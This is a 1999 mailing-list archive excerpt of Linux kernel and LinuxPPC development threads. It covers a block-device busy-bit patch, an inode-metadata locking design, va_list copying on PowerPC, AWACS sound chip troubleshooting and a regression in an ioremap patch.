dynamic MAJOR/MINOR codes:
we must replace all 'MAJOR==LOOP', 'MAJOR==IDE' etc. if we want to
support dynamic block device MAJOR/MINOR's.

Additionally, we save 6-8 kB kernel memory. (ro_bits was an 8 kB
static array).

If you think that the patch is usefull, then I'll make a new patch
vs 2.3.0, otherwise I'll wait until devfs is added, and I'll
try to write a larger patch (dynamic MAJOR/MINOR for block cache)
that includes this one.

--
	Manfred

[-- Attachment #2: patch_busy-2.2.6 --]
[-- Type: text/plain, Size: 5707 bytes --]

diff -r -u -P -x CVS -x *,v 2.2.6/drivers/block/ll_rw_blk.c current/drivers/block/ll_rw_blk.c
--- 2.2.6/drivers/block/ll_rw_blk.c	Wed Mar 31 00:56:57 1999
+++ current/drivers/block/ll_rw_blk.c	Thu Apr 22 18:02:20 1999
@@ -16,6 +16,7 @@
 #include <linux/config.h>
 #include <linux/locks.h>
 #include <linux/mm.h>
+#include <linux/slab.h>
 #include <linux/init.h>
 
 #include <asm/system.h>
@@ -241,8 +242,24 @@
 }
 
 /* RO fail safe mechanism */
+/* device busy: (C) Manfred Spraul masp0008@stud.uni-sb.de */
 
-static long ro_bits[MAX_BLKDEV][8];
+struct kdev_bits {
+	unsigned char ro_bits[(1U << MINORBITS)/8];
+	unsigned char busy_bits[(1U << MINORBITS)/8];
+};
+
+static struct kdev_bits* kdev_info[MAX_BLKDEV] = { NULL, NULL };
+
+#define ALLOC_KDEV_BITS(major) \
+	if (kdev_info[major] == NULL) { \
+		kdev_info[major] = kmalloc(sizeof(struct kdev_bits),GFP_KERNEL); \
+		if(kdev_info[major] == NULL) { \
+			printk("ALLOC_KDEV_BITS() failed due to ENOMEM.\n"); \
+			return; \
+		} \
+		memset(kdev_info[major],0,sizeof(struct kdev_bits)); \
+	}
 
 int is_read_only(kdev_t dev)
 {
@@ -251,7 +268,8 @@
 	major = MAJOR(dev);
 	minor = MINOR(dev);
 	if (major < 0 || major >= MAX_BLKDEV) return 0;
-	return ro_bits[major][minor >> 5] & (1 << (minor & 31));
+	if (kdev_info[major] == NULL) return 0;
+     	return kdev_info[major]->ro_bits[minor >> 3] & (1 << (minor & 7));
 }
 
 void set_device_ro(kdev_t dev,int flag)
@@ -261,10 +279,39 @@
 	major = MAJOR(dev);
 	minor = MINOR(dev);
 	if (major < 0 || major >= MAX_BLKDEV) return;
-	if (flag) ro_bits[major][minor >> 5] |= 1 << (minor & 31);
-	else ro_bits[major][minor >> 5] &= ~(1 << (minor & 31));
+	ALLOC_KDEV_BITS(major)
+	if (flag)
+		kdev_info[major]->ro_bits[minor >> 3] |= 1 << (minor & 7);
+	 else
+		kdev_info[major]->ro_bits[minor >> 3] &= ~(1 << (minor & 7));
+}
+
+int is_device_busy(kdev_t dev)
+{
+	int minor,major;
+
+	major = MAJOR(dev);
+	minor = MINOR(dev);
+	if (major < 0 || major >= MAX_BLKDEV) return 0;
+	if (kdev_info[major] == NULL) return 0;
+	return kdev_info[major]->busy_bits[minor >> 3] & (1 << (minor & 7));
 }
 
+void set_device_busy(kdev_t dev,int flag)
+{
+	int minor,major;
+	
+	major = MAJOR(dev);
+	minor = MINOR(dev);
+	if (major < 0 || major >= MAX_BLKDEV) return;
+	ALLOC_KDEV_BITS(major)
+	if (flag)
+		kdev_info[major]->busy_bits[minor >> 3] |= 1 << (minor & 7);
+	 else
+		kdev_info[major]->busy_bits[minor >> 3] &= ~(1 << (minor & 7));
+}
+
+
 static inline void drive_stat_acct(int cmd, unsigned long nr_sectors,
                                    short disk_index)
 {
@@ -731,7 +778,6 @@
 		req->rq_status = RQ_INACTIVE;
 		req->next = NULL;
 	}
-	memset(ro_bits,0,sizeof(ro_bits));
 	memset(max_readahead, 0, sizeof(max_readahead));
 	memset(max_sectors, 0, sizeof(max_sectors));
 #ifdef CONFIG_AMIGA_Z2RAM
diff -r -u -P -x CVS -x *,v 2.2.6/fs/super.c current/fs/super.c
--- 2.2.6/fs/super.c	Tue Apr 20 13:41:57 1999
+++ current/fs/super.c	Thu Apr 22 18:02:20 1999
@@ -131,6 +131,7 @@
 		vfsmnttail->mnt_next = lptr;
 		vfsmnttail = lptr;
 	}
+	set_device_busy(sb->s_dev,1);
 out:
 	return lptr;
 }
@@ -165,6 +166,8 @@
 	kfree(tofree->mnt_devname);
 	kfree(tofree->mnt_dirname);
 	kfree_s(tofree, sizeof(struct vfsmount));
+
+	set_device_busy(dev,0);
 }
 
 int register_filesystem(struct file_system_type * fs)
@@ -873,6 +876,8 @@
 	if (dir_d->d_covers != dir_d)
 		goto dput_and_out;
 
+	if (is_device_busy(dev))
+		goto dput_and_out;
 	/*
 	 * Note: If the superblock already exists,
 	 * read_super just does a get_super().
diff -r -u -P -x CVS -x *,v 2.2.6/include/linux/fs.h current/include/linux/fs.h
--- 2.2.6/include/linux/fs.h	Tue Apr 20 13:41:58 1999
+++ current/include/linux/fs.h	Thu Apr 22 18:02:20 1999
@@ -839,6 +839,8 @@
 extern struct buffer_head * find_buffer(kdev_t dev, int block, int size);
 extern void ll_rw_block(int, int, struct buffer_head * bh[]);
 extern int is_read_only(kdev_t);
+extern int is_device_busy(kdev_t);
+extern void set_device_busy(kdev_t dev, int flag);
 extern void __brelse(struct buffer_head *);
 extern inline void brelse(struct buffer_head *buf)
 {
diff -r -u -P -x CVS -x *,v 2.2.6/kernel/ksyms.c current/kernel/ksyms.c
--- 2.2.6/kernel/ksyms.c	Wed Mar 31 00:56:57 1999
+++ current/kernel/ksyms.c	Thu Apr 22 18:02:20 1999
@@ -47,7 +47,7 @@
 #endif
 
 extern char *get_options(char *str, int *ints);
-extern void set_device_ro(kdev_t dev,int flag);
+extern void set_device_ro(kdev_t dev, int flag);
 extern struct file_operations * get_blkfops(unsigned int);
 extern int blkdev_release(struct inode * inode);
 #if !defined(CONFIG_NFSD) && defined(CONFIG_NFSD_MODULE)
@@ -209,6 +209,8 @@
 EXPORT_SYMBOL(blk_dev);
 EXPORT_SYMBOL(is_read_only);
 EXPORT_SYMBOL(set_device_ro);
+EXPORT_SYMBOL(is_device_busy);
+EXPORT_SYMBOL(set_device_busy);
 EXPORT_SYMBOL(bmap);
 EXPORT_SYMBOL(sync_dev);
 EXPORT_SYMBOL(get_blkfops);
diff -r -u -P -x CVS -x *,v 2.2.6/mm/swapfile.c current/mm/swapfile.c
--- 2.2.6/mm/swapfile.c	Wed Mar 31 00:56:57 1999
+++ current/mm/swapfile.c	Thu Apr 22 18:02:20 1999
@@ -414,6 +414,7 @@
 			filp.f_op->release(dentry->d_inode,&filp);
 			filp.f_op->release(dentry->d_inode,&filp);
 		}
+		set_device_busy(p->swap_device,0);
 	}
 	dput(dentry);
 
@@ -531,6 +532,10 @@
 
 	if (S_ISBLK(swap_dentry->d_inode->i_mode)) {
 		p->swap_device = swap_dentry->d_inode->i_rdev;
+		if(is_device_busy(p->swap_device)) {
+			error = -EBUSY;
+			goto bad_swap;
+		}
 		set_blocksize(p->swap_device, PAGE_SIZE);
 		
 		filp.f_dentry = swap_dentry;
@@ -686,6 +691,8 @@
 		swap_info[prev].next = p - swap_info;
 	}
 	error = 0;
+	if(p->swap_device != 0)
+		set_device_busy(p->swap_device,1);
 	goto out;
 bad_swap:
 	if(filp.f_op && filp.f_op->release)


^ permalink raw reply	[relevance 44%]

* [FYI][RFC] Way to deal with filesystems with jumping pieces of inodes (was Re: HPFS bug in lookup())
       [not found]     <Pine.LNX.3.96.990515232120.14004A-101000@artax.karlin.mff.cuni.cz>
@ 1999-05-16  4:40 35% ` Alexander Viro
  0 siblings, 0 replies; 200+ results
From: Alexander Viro @ 1999-05-16  4:40 UTC (permalink / raw)
  To: Mikulas Patocka; +Cc: linux-fsdevel, linux-kernel


[D'oh! It grew longer than I expected. Sorry. Originally it was going to be
a reply to email from Mikulas, but probably it's worth Cc'ing to lists.
Apologies for the head of the text - I've tried to give some explanation
of the context. Short summary: how to deal with filesystems that keep bits
and pieces of inode in a directory without excessive locking and races.]

	As we all know, decent and sane filesystems keep inode metadata out
of the directories.  The problem being: not all filesystems are sane or
even decent.  With respect to fs driver it means that we are going to have
a lot of potential races between the write_inode() method and *every*
namespace-modifying one.  Usual solutions involve a lot of locking, are
not too clean deadlock-wise and either heavily penalize write_inode() or
involve a lot of complications in namespace stuff (namei.c).
	I tried to construct a clean way to deal with those issues when
I did a FAT cleanup.  Situation with FAT had additional componenet of fun
- it has *no* out-of-directory metadata and that means that we have no
chance for even remotely sane iget().  Inumbers should stay constant for
the whole lifetime of in-core inode and that alone killed the idea of
using metadata location as inumber.  rename() could change it and we had
to reserve the directory entries of unlinked-but-still-open files.  As the
result FAT driver and derived filesystem drivers had extremely complicated
mess in directory/inode/namespace handling and contained both the rough
locking and really impressive collection of races.  During that Spring I
did a rewrite of directory/inode handling in FAT and massive cleanup of
msdosfs and VFAT namespace handling. Some fixes went into 2.2.x, the whole
thing is in 2.3.2.
	It seems that some parts of the aforementioned rewrite can be
useful for other filesystems, in particular for HPFS.  Here it comes:

	The main problem with keeping inode metadata in directories is that
VFS provides some protection from races, but it doesn't (and shouldn't) 
serialize write_inode() wrt namespace manipulations.  Said manipulations
are serialized within the same directory, but that's it.  write_inode()
may be called when the parent directory is in the middle of a change.
So some amount of serialization should be done within fs driver.
	Proposed solution is based on the following: VFS removes 'dirty' bit
on inode *before* the write_inode() is called.  So if mark_inode_dirty()
happens when write_inode() is still in progress we will get the same result
as if it would be called immediately after the write_inode() completion.
Suppose we can easily find an inode that owns given piece of in-directory
metadata.  Then we can use the following strategy:
	a) keep a per-fs spinlock.
	b) store the location of in-directory metadata in fs-specific
part of in-core inode (->u.foo_i.location)
	c) define two primitives: attach_inode(inode, location) and
detach_inode(inode).
	attach_inode(inode, pos) should grab the spinlock, set
inode->u.foo_i.location to pos and release the pinlock.
	detach_inode(inode) should grab the spinlock, set
inode->u.foo_i.location to some reserved value (0 seems to be a natural
choice) and release the spinlock.
	d) whenever the namespace-modifying operation is going to move
or delete a directory entry it should find whether it is owned by some
in-core inode (in many cases it will be immediately known to calling function)
and if it indeed is do detach_inode(inode);  If we are moving the entry
we should do attach_inode(inode, new_location); mark_inode_dirty(inode);
afterwards.
	e) write_inode() method should do the following:
		Write normal part of inode;
	     retry:
		pos = inode->u.foo_i.location;
		if (pos == DETACHED)
			return;
		bh = bread(dev, BLOCK_BY_LOCATION(pos), sb->s_blocksize);
		spin_lock(&spinlock);
		if (pos != inode->u.foo_i.location) {
			spin_unlock(&spinlock);
			brelse(bh);
			goto retry;
		}
		Put in-directory metadata to the right place of bh->b_data.
		spin_unlock(&spinlock);
		mark_buffer_dirty(bh, 1);
		brelse(bh);

How it works? First of all, with such strategy write_inode() is guaranteed to
put the in-directory metadata into the right place.  Since after the move
we are doing attach_inode() we are guaranteed that metadata *will* be written.
Notice that we don't search for in-directory metadata upon write_inode().
Which is *big* win in case of filesystems a-la HPFS.

	Potential penalty is in finding an in-core inode by the chunk of
metadata.  In case of relatively sane filesystems it can be done with
trimmed-down version of iget() that would return NULL instead of trying
to read the inode from disk.  Another possibility (the only possibility for
filesystems without decent inumbers) is more interesting and in principle
gives better performance.  It relies on another trick: shadow pointers to
inodes. Actually this technics may be useful not only here. There we go:

	You can safely keep references to in-core inode *not counting them
in ->i_count and not disturbing icache behaviour* if
	a) you provide ->clear_inode() method and forget all 'shadow'
references to inode as soon as foo_clear_inode(inode) is called.
	b) you must serialize all dereferencing of shadow references wrt
foo_clear_inode().
	c) to obtain a normal reference you should call igrab(foo) and it
will either give you a safe reference to the the same inode (i.e. increment
foo->i_count and return foo) or it will return NULL, in which case you should
act as if foo has been forgotten (see (a)).
	d) You should serialize calls of igrab() wrt foo_clear_inode().

	For example, if you want to keep a hash-table of inodes you can do it
in the following way:
	* hold a spinlock whenever you are doing a search or modification
	  of said hash.
	* start foo_clear_inode(inode) with removing the inode from hash
	  (grabbing the same lock, indeed).
	* in the very end of hash search (before releasing the spinlock)
	  pass the result of search (if something was found, indeed) to
	  igrab() and if igrab() will return NULL consider it as "not found".
With obvious modifications it can be used to deal with arbitrary data
structures. 

	Why is it tricky?  Well, we don't want to disturb icache behaviour
(i.e. fiddle with inode reusing, etc.), so we can't protect references with
i_count.  The whole point of the exercise is to allow icache to take inodes
from us whenever it normally would.  So we have to do something to avoid
dangling references.
	Why does it work?  Icache always calls ->clear_inode() before reusing
the thing.  So the whole affair was the matter of setting I_FREEING in
inode->i_state when the call of clear_inode() becomes inevitable (i.e. when
the thing can't be salvaged by iget() anymore).  igrab() was trivial -
essentially it checks for I_FREEING in ->i_state and either returns NULL
or increments ->i_count and returning its argument (it also has to grab
inode_lock, etc. - see details in fs/inode.c, the thing is a ten-liner).

	Application of the above to the search of inode by in-directory
metadata is trivial - we can use ->u.foo_i.location as hash index, make
{attach,detach}_inode() hash/unhash the thing and use the same spinlock
for all serialization needed (->write_inode, attach_inode, detach_inode and
hash search; ->clear_inode() should start from detach_inode() and it will
automatically give us needed protection).
	It is faster than icache search simply because the hash is smaller -
only inodes belonging to the fs driver in question.
	In many cases we simply know the in-core inode from the very beginning.
E.g. if we are doing rename() on FAT-derived filesystem we have the dentry
and inode *before* we've seen the directory entry. Non-trivial cases when
we really need to search may happen with filesystems a-la HPFS, where we
have to move directory entries of completely unrelated objects (HPFS keeps
directories as B-trees).
	Notice that search through dcache (after all, we know the parent) is
not enough here.  Consider the following scenario: inode of /foo/bar is dirty.
Something invoked shrink_dcache().  Dentry of /foo/bar is tossed away.  iput()
is appiled to the inode.  Now suppose that some operation reshuffles /foo,
moving the directory entry of bar.  Since /foo/bar is no longer in dcache
we would miss the inode in question.  Fun, fun - it's right in the middle
of write_inode() and is going to write something into the old place in /foo.


-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/

^ permalink raw reply	[relevance 35%]

* possible egcs c compiler bug
@ 1999-05-19 20:19 62% Thomas C. Allison
  1999-05-19 20:56 64% ` Brad Boyer
                   ` (2 more replies)
  0 siblings, 3 replies; 200+ results
From: Thomas C. Allison @ 1999-05-19 20:19 UTC (permalink / raw)
  To: linuxppc-user; +Cc: linuxppc-dev


I have found what *appears* to be a bug in the C compiler.  I have experienced
this bug in R4 (regardless of the compiler/library installed) as well as in
the latest (i.e. all the latest packages through 5/15/1999) pre-R5
installation.  I include a short program below which illustrates the problem
I am having.  The code compiles without error on my i386 machine
running RHL 5.2.  The version of EGCS on the PC is 1.0.3 versus 1.1.2 on my
PowerMac, so I don't know if this is a PPC problem or an EGCS problem.
Any input is greatly appreciated.

The code is as follows:

test.c:

     #include <stdio.h>
     #include <stdarg.h>

     static int myFunction(va_list inList)
     {
        va_list newList;
        newList = inList;
     }

When I try to compile the code

     % gcc -c test.c

I get the following error message

     test.c: In function `myFunction':
     test.c:7: incompatible types in assignment

Any ideas?

Thanks in advance,

Tom

+------------------------------------------------------------------------------+
| Dr. Thomas C. Allison                          | thomas.allison@nist.gov     |
| Computational Chemistry Group                  | (301)975-2216 (voice)       |
| National Institute of Standards and Technology | (301)869-4020 (fax)         |
| 100 Bureau Drive, Stop 8380                    |                             |
| Gaithersburg, Maryland 20899-8380              |                             |
+------------------------------------------------------------------------------+
  Chemistry is applied theology.  --- Augustus Stanley Owsley III

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 62%]

* Re: possible egcs c compiler bug
  1999-05-19 20:19 62% possible egcs c compiler bug Thomas C. Allison
@ 1999-05-19 20:56 64% ` Brad Boyer
  1999-05-19 21:04 64% ` Hartmut Koptein
  1999-05-19 21:26 64% ` Franz Sirl
  2 siblings, 0 replies; 200+ results
From: Brad Boyer @ 1999-05-19 20:56 UTC (permalink / raw)
  To: Thomas C. Allison; +Cc: linuxppc-user, linuxppc-dev


> I have found what *appears* to be a bug in the C compiler.  I have experienced
> this bug in R4 (regardless of the compiler/library installed) as well as in
> the latest (i.e. all the latest packages through 5/15/1999) pre-R5
> installation.  I include a short program below which illustrates the problem
> I am having.  The code compiles without error on my i386 machine
> running RHL 5.2.  The version of EGCS on the PC is 1.0.3 versus 1.1.2 on my
> PowerMac, so I don't know if this is a PPC problem or an EGCS problem.
> Any input is greatly appreciated.

"It's not a bug, it's a feature"...

You're using something that is not technically the proper way to use
va_list in your code.  However, that code works on everything but ppc.
It has to do with the way va_list is implemented on any ppc platform,
and causes all sorts of strange things to happen when you don't follow
the spec close enough.  Find a better way to copy the va_list.  Just
using the = operator isn't enough on ppc.  Use a block copy of
sizeof(va_list) bytes, or some such.  This has come up before, so if
you search the list archives, you should find sample code.  Someone
else could give a lot more details on this.  I only know the general
overview.

      Brad Boyer
      flar@cegt201.bradley.edu

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 64%]

* Re: possible egcs c compiler bug
  1999-05-19 20:19 62% possible egcs c compiler bug Thomas C. Allison
  1999-05-19 20:56 64% ` Brad Boyer
@ 1999-05-19 21:04 64% ` Hartmut Koptein
  1999-05-19 21:26 64% ` Franz Sirl
  2 siblings, 0 replies; 200+ results
From: Hartmut Koptein @ 1999-05-19 21:04 UTC (permalink / raw)
  To: Thomas C. Allison; +Cc: linuxppc-user, linuxppc-dev


> I have found what *appears* to be a bug in the C compiler.  I have experienced
> this bug in R4 (regardless of the compiler/library installed) as well as in
> the latest (i.e. all the latest packages through 5/15/1999) pre-R5
> installation.  I include a short program below which illustrates the problem
> I am having.  The code compiles without error on my i386 machine
> running RHL 5.2.  The version of EGCS on the PC is 1.0.3 versus 1.1.2 on my
> PowerMac, so I don't know if this is a PPC problem or an EGCS problem.
> Any input is greatly appreciated.
> 
> The code is as follows:
> 
> test.c:
> 
>      #include <stdio.h>
>      #include <stdarg.h>
> 
>      static int myFunction(va_list inList)
>      {
>         va_list newList;
>         newList = inList;
>      }


Try this:

      #include <stdio.h>
      #include <stdarg.h>

      static int myFunction(va_list inList)
      {
         va_list newList;
         
	 __va_copy(newList, inList);
      }




-- 
 Dipl.-Ing. (FH) Hartmut Koptein                       EMail:
 Friedrich-van-Senden-Str. 7                           
 26603 Aurich   
 Tel.: +49-4941-10390                                  koptein@debian.org

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 64%]

* Re: possible egcs c compiler bug
  1999-05-19 20:19 62% possible egcs c compiler bug Thomas C. Allison
  1999-05-19 20:56 64% ` Brad Boyer
  1999-05-19 21:04 64% ` Hartmut Koptein
@ 1999-05-19 21:26 64% ` Franz Sirl
  2 siblings, 0 replies; 200+ results
From: Franz Sirl @ 1999-05-19 21:26 UTC (permalink / raw)
  To: linuxppc-dev, Thomas C. Allison, linuxppc-user


Am Wed, 19 May 1999 schrieb Thomas C. Allison:
>I have found what *appears* to be a bug in the C compiler.  I have experienced
>this bug in R4 (regardless of the compiler/library installed) as well as in
>the latest (i.e. all the latest packages through 5/15/1999) pre-R5
>installation.  I include a short program below which illustrates the problem
>I am having.  The code compiles without error on my i386 machine
>running RHL 5.2.  The version of EGCS on the PC is 1.0.3 versus 1.1.2 on my
>PowerMac, so I don't know if this is a PPC problem or an EGCS problem.
>Any input is greatly appreciated.
>
>The code is as follows:
>
>test.c:
>
>     #include <stdio.h>
>     #include <stdarg.h>
>
>     static int myFunction(va_list inList)
>     {
>        va_list newList;
>        newList = inList;
>     }
>
>When I try to compile the code
>
>     % gcc -c test.c
>
>I get the following error message
>
>     test.c: In function `myFunction':
>     test.c:7: incompatible types in assignment
>
>Any ideas?

That is simply unportable code. va_list maybe of any underlying type, and is in
this case an array. If you want portable code, use:

     static int myFunction(va_list inList)
     {
        va_list newList;
        __va_copy(newList, inList);
     }

If you use varargs extensively in your application, I strongly recommend you to
use egcs-*1.1.2-12c or later on DRR1/preR5, which fixes some annoying bugs
in the ppc-linux varargs handling.

Franz.

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 64%]

* Re: AWACS Bug
@ 1999-05-24 22:00 64% Scott Sams
  1999-05-25 10:42 64% ` Benjamin Herrenschmidt
  0 siblings, 1 reply; 200+ results
From: Scott Sams @ 1999-05-24 22:00 UTC (permalink / raw)
  To: linuxppc-dev


Paul Mackerras <paulus@cs.anu.edu.au> wrote:

> What's happening is I think the same as what happens on the iMac: when
> you run the BootX app to boot linux, and it asks macos to shut down,
> macos shuts down the awacs, in such a fashion that the only thing that
> will start it up again is a hard reset. :-( 

I believe the same thing has happened on my box, although a hardware
reset has yet to fix the problem! :-<

Sound does not come out of either the internal speaker, or the line out
jack. Playing a .wav or a CD produces no sound. MacOS will not play any
sounds too. I have tried everything from hard resets to power cycling to
zapping the PRAM 3 times, and nothing has brought my sound back. Do any
of you hardware gurus out there know if it is possible to manually reset
the AWACS chip? Does this mean I fried my AWACS chip? How could I
replace it if necessary? Please help.

Thanks,

Scott Sams

-- 
 ____ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      Scott Sams         
(____  _  _-|-|-                    sbsams@eos.ncsu.edu      
_____)(__(_)| |        http://www.catt.ncsu.edu/~sbsams
~~~~~~~~~~~~~~~~

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 64%]

* Re: AWACS Bug
  1999-05-24 22:00 64% AWACS Bug Scott Sams
@ 1999-05-25 10:42 64% ` Benjamin Herrenschmidt
  0 siblings, 0 replies; 200+ results
From: Benjamin Herrenschmidt @ 1999-05-25 10:42 UTC (permalink / raw)
  To: Scott Sams, linuxppc-dev


On Mon, May 24, 1999, Scott Sams <sbsams@eos.ncsu.edu> wrote:

>Paul Mackerras <paulus@cs.anu.edu.au> wrote:
>
>> What's happening is I think the same as what happens on the iMac: when
>> you run the BootX app to boot linux, and it asks macos to shut down,
>> macos shuts down the awacs, in such a fashion that the only thing that
>> will start it up again is a hard reset. :-( 

I do have a fix for that but this fix is still not tested and not in
BootX. I'll try to find some time to finish sometimes this week. (The fix
is a hack: I patch the MacOS burgundy driver to prevent the shutdown.
Also this works only with versions of the driver that do export their
function names thru the TOC, which may not be the case of future versions).


-- 
           Perso. e-mail: <mailto:bh40@calva.net>
           Work   e-mail: <mailto:benh@mipsys.com>
BenH.      Web   : <http://calvaweb.calvacom.fr/bh40/>




[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 64%]

* Re: AWACS Bug
       [not found]     <Pine.GSO.4.05.9905251646130.14882-100000@mail.wesleyan.edu>
@ 1999-05-27  4:42 64% ` Scott Sams
  1999-05-27  5:19 58%   ` Jason Y. Sproul
  0 siblings, 1 reply; 200+ results
From: Scott Sams @ 1999-05-27  4:42 UTC (permalink / raw)
  To: jsproul, linuxppc-dev


Thank you for the helpful information. However, neither of the tricks
you suggested helped me. Is it possible to damage the AWACS chip on the
motherboard (maybe by an electrical surge?) and still have the machine
run? 

I guess I will have to install a new card. Do you know of any other PCI
sound cards that work under linuxppc on a powermac?

Thanks,

Scott

Jason Y. Sproul wrote:
> 
> Have you tried a motherboard reset and/or powerdown? For the former, you
> have to locate the reset switch on the motherboard - should be near the
> battery. For the latter, you have to yank the backup battery on the
> motherboard and leave it out and the machine unconnected to *anything* for
> at least four hours. (Overnight is preferable.) I've seen Macs get wedged
> badly enough that an mboard powerdown and a few hits of the reset were
> necessary to flush everything. Developing PCI cards isn't always fun...
> 
> ........................................................................
> Jason Y. Sproul                    http://www.con.wesleyan.edu/~jsproul/
> jsproul@wesleyan.edu            jsproul@iced.com    http://www.iced.com/
>      Eagles may soar, but weasels don't get sucked into jet engines.

-- 
 ____ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~      Scott Sams         
(____  _  _-|-|-                    sbsams@eos.ncsu.edu      
_____)(__(_)| |        http://www.catt.ncsu.edu/~sbsams
~~~~~~~~~~~~~~~~

[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 64%]

* Re: AWACS Bug
  1999-05-27  4:42 64% ` Scott Sams
@ 1999-05-27  5:19 58%   ` Jason Y. Sproul
  0 siblings, 0 replies; 200+ results
From: Jason Y. Sproul @ 1999-05-27  5:19 UTC (permalink / raw)
  To: Scott Sams; +Cc: linuxppc-dev


On Thu, 27 May 1999, Scott Sams wrote:

> Thank you for the helpful information. However, neither of the tricks
> you suggested helped me.

Wow... That sounds rather hard-core.

> Is it possible to damage the AWACS chip on the motherboard (maybe by an
> electrical surge?) and still have the machine run?

I suppose so, although it would almost certainly have to come from a source
other than the motherboard that could create a voltage across just the
AWACS without also toasting other components. Highly improbable. A simple
statistical failure of the chip itself is more likely than that, though a
short in the connections to the various outputs is possible too.

1. You mentioned checking the ports. There should be fuses on all of them,
in theory, as well as the speaker lines. Fuses burn out.

2. Instrument the AWACS driver heavily with printk()s and see if the
various settings of the control registers are actually working, or if the
chip is a total zombie.

3. If you've got a voltmeter (or, in a perfect world, an oscilloscope) try
watching the various output lines as you play sounds. Single frequencies
are best if you've got an oscilloscope that'll trigger on them. If there's
a signal there, you can probably trace the failure to another component
that might be replaceable with a bit of surgery. (Amplifier, pull-up
resistor, capacitor, wiring, something like that.) Work backwards from the
output port contacts towards the AWACS using the port specs in your user's
guide technical appendix. I assume that the AWACS clocks from the bus, but
you might want to make sure there's not an associated clock that's gone
dead. Try not to short out your entire motherboard in the process.

If the above all fail, you're probably SOL.

> I guess I will have to install a new card. Do you know of any other PCI
> sound cards that work under linuxppc on a powermac?

Not offhand. I've been meaning to explore this, but I've already got too
much going on just now. :^)

........................................................................
Jason Y. Sproul                    http://www.con.wesleyan.edu/~jsproul/
jsproul@wesleyan.edu        jsproul@iced.com        http://www.iced.com/
     Eagles may soar, but weasels don't get sucked into jet engines.


[[ This message was sent via the linuxppc-dev mailing list.  Replies are ]]
[[ not  forced  back  to the list, so be sure to Cc linuxppc-dev if your ]]
[[ reply is of general interest. Please check http://lists.linuxppc.org/ ]]
[[ and http://www.linuxppc.org/ for useful information before posting.   ]]

^ permalink raw reply	[relevance 58%]

* Bug in vger 2.2.10 and 2.3.4 (Re: Problems with vger 2.3.3/4)
  @ 1999-06-02 12:19 59% ` Martin Costabel
  1999-06-03  1:24 64%   ` Ryuichi Oikawa
  1999-06-03  2:50 64%   ` Paul Mackerras
  0 siblings, 2 replies; 200+ results
From: Martin Costabel @ 1999-06-02 12:19 UTC (permalink / raw)
  To: linuxppc-dev; +Cc: Cort Dougan


A while ago I reported about boot problems with the vger 2.3.x kernel
after May 22. Now I found that this same bug has crept into the "stable"
tree, starting with 2.2.10 on May 30. After some digging, I found the
culprit. It is the file arch/ppc/mm/init.c, patched (wrongly) as
follows:

root[17]#cvs diff -u -r1.165 -r1.166 arch/ppc/mm/init.c
Index: arch/ppc/mm/init.c
===================================================================
RCS file: /cvs/linux/linux/arch/ppc/mm/init.c,v
retrieving revision 1.165
retrieving revision 1.166
diff -u -r1.165 -r1.166
--- arch/ppc/mm/init.c  1999/05/14 22:37:29     1.165
+++ arch/ppc/mm/init.c  1999/05/22 18:18:30     1.166
@@ -1,5 +1,5 @@
 /*
- *  $Id: init.c,v 1.165 1999/05/14 22:37:29 cort Exp $
+ *  $Id: init.c,v 1.166 1999/05/22 18:18:30 cort Exp $
  *
  *  PowerPC version 
  *    Copyright (C) 1995-1996 Gary Thomas (gdt@linuxppc.org)
@@ -402,7 +402,7 @@
    for (i = 0; i < size; i += PAGE_SIZE)
        map_page(&init_task, v+i, p+i, flags);
 out:
-   return (void *) (v + (p & ~PAGE_MASK));
+   return (void *) (v + (addr & ~PAGE_MASK));
 }
 
 void iounmap(void *addr)

This patch had been proposed on May 21 by R. Oikawa and almost
immediately been corrected, see
http://lists.linuxppc.org/listarcs/linuxppc-user/199905/msg00680.html
Unfortunately, the correction didn't make it into the vger tree. I don't
know if the correction is good, but I never had problems with the
version before the patch.

In addition to the 2 problems mentioned below, I also found that the
2.2.10 kernel writes some vicious binary garbage into my
/var/log/messages file which eventually completely screws up. When
trying to read it, I get IO errors (reading beyond end of device). 

--
Martin

Martin Costabel wrote:
> 
> On my 6400/200, the 2.3.3 (now 2.3.4) kernel from the vger tree has
> problems that started last Sunday:
> 
> The sources checked out on May 21 give a kernel that runs perfectly, but
> starting from updates on May 22 and until right now, two problems showed
> up whose origin I could not identify, although I spent time staring at
> source files and cvs logs and trying things:
> 
> The first one is related to the IDE driver. At boot time, in the
> partition check section, it gives me
